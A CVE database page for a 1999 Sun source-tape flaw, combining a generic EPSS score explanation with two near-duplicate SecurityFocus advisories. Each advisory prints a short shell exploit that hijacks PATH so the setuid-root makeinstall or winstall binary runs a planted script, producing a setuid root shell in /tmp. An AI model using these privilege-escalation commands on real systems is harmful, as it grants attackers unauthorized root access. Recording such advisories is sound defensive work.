CVE-1999-1123 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/22/info This applies to sites that have installed Sun Source tapes only. The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable. This makes it possible for users on that system to become root. $ cp /bin/sh /tmp/sh $ echo chmod 4777 /tmp/sh > /tmp/install $ chmod a+rx /tmp/install $ set PATH=/tmp:$PATH $ export PATH $ /usr/bin/winstall $ /tmp/sh #

source: https://www.securityfocus.com/bid/21/info This applies to sites that have installed Sun Source tapes only. The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable. This makes it possible for users on that system to become root. $ cp /bin/sh /tmp/sh $ echo chmod 4777 /tmp/sh > /tmp/make $ chmod a+rx /tmp/make $ set PATH=/tmp:$PATH $ export PATH $ /usr/bin/makeinstall $ /tmp/sh #